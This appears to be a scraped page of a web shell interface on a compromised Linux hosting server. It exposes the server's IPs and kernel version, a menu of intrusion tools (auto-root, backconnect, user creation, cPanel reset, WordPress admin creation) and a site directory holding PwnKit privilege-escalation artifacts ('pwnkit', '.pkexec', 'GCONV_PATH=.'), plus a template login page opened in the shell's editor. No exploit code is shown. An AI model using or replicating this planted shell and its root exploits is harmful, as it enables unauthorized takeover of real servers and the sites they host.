Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.147.45.25
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
itailorBlog /
admin /
page /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
auth-forgot-password.html
2.23
KB
-rw-r--r--
auth-login.html
2.65
KB
-rw-r--r--
auth-register.html
2.95
KB
-rw-r--r--
auth-reset-password.html
3.01
KB
-rw-r--r--
blank-pages.html
11.13
KB
-rw-r--r--
bootstrap-alert.html
17.66
KB
-rw-r--r--
bootstrap-badge.html
17.97
KB
-rw-r--r--
bootstrap-breadcrumb.html
19.83
KB
-rw-r--r--
bootstrap-buttons.html
24.08
KB
-rw-r--r--
bootstrap-card.html
24.57
KB
-rw-r--r--
bootstrap-carousel.html
16.98
KB
-rw-r--r--
bootstrap-dropdown.html
54.58
KB
-rw-r--r--
bootstrap-list-group.html
28.68
KB
-rw-r--r--
bootstrap-modal.html
60.02
KB
-rw-r--r--
bootstrap-nav.html
18.15
KB
-rw-r--r--
bootstrap-pagination.html
23.82
KB
-rw-r--r--
bootstrap-progress.html
17.37
KB
-rw-r--r--
bootstrap-spinner.html
17.11
KB
-rw-r--r--
chart-apexcharts.html
13.29
KB
-rw-r--r--
chart-chartjs.html
12.26
KB
-rw-r--r--
component-avatar.html
15.06
KB
-rw-r--r--
component-hero.html
12.96
KB
-rw-r--r--
component-sweet-alert.html
18.04
KB
-rw-r--r--
component-toastify.html
15.02
KB
-rw-r--r--
credits.html
14.11
KB
-rw-r--r--
errors-403.html
1.28
KB
-rw-r--r--
errors-404.html
1.24
KB
-rw-r--r--
errors-500.html
1.26
KB
-rw-r--r--
errors-503.html
1.24
KB
-rw-r--r--
forms-checkbox.html
28.16
KB
-rw-r--r--
forms-editor.html
14.36
KB
-rw-r--r--
forms-radio.html
20.2
KB
-rw-r--r--
forms-validation.html
14.38
KB
-rw-r--r--
icons-boostrap.html
723.36
KB
-rw-r--r--
icons-fontawesome.html
628.16
KB
-rw-r--r--
index.html
16.17
KB
-rw-r--r--
layout-default.html
11.49
KB
-rw-r--r--
layout-top-navigation.html
11.51
KB
-rw-r--r--
my-profile.html
15.34
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
widgets-chatboxs.html
11.42
KB
-rw-r--r--
widgets-email.html
11.42
KB
-rw-r--r--
widgets-pricing.html
26.45
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : auth-forgot-password.html
<!doctype html> <html lang="en"> <head> <!-- Required meta tags --> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>Forgot Password - Atrana</title> <!-- Bootstrap CSS--> <link rel="stylesheet" href="assets/modules/bootstrap-5.1.3/css/bootstrap.css"> <!-- Style CSS --> <link rel="stylesheet" href="assets/css/style.css"> <!-- Boostrap Icon--> <link rel="stylesheet" href="assets/modules/bootstrap-icons/bootstrap-icons.css"> </head> <body> <div id="auth"> <div class="row h-100"> <div class="col-lg-7 d-none d-lg-block"> <div id="auth-left"> </div> </div> <div class="col-lg-5 col-12"> <div id="auth-right"> <div class="auth-logo"> <a href="index.html"><img src="assets/images/logo.png" alt="Logo"> Atrana</a> </div> <h1 class="auth-title">Forgot Password.</h1> <p class="auth-subtitle mb-5">Input your email and we will send you reset password link.</p> <form action="index.html"> <div class="form-group position-relative has-icon-left mb-4"> <input type="email" class="form-control form-control-xl" placeholder="Email"> <div class="form-control-icon"> <i class="bi bi-envelope"></i> </div> </div> <button class="btn btn-primary btn-block btn-lg shadow-lg mt-5">Send</button> </form> <div class="text-center mt-5 text-lg fs-4"> <p class='text-gray-600'>Remember your account? <a href="auth-login.html" class="font-bold">Log in</a>. </p> </div> </div> </div> </div> </div> <!-- General JS Scripts --> <script src="assets/js/atrana.js"></script> <!-- JS Libraies --> <script src="assets/modules/jquery/jquery.min.js"></script> <script src="assets/modules/bootstrap-5.1.3/js/bootstrap.bundle.min.js"></script> <script src="assets/modules/popper/popper.min.js"></script> <!-- Template JS File --> <script src="assets/js/script.js"></script> <script src="assets/js/custom.js"></script> </body> </html>
Close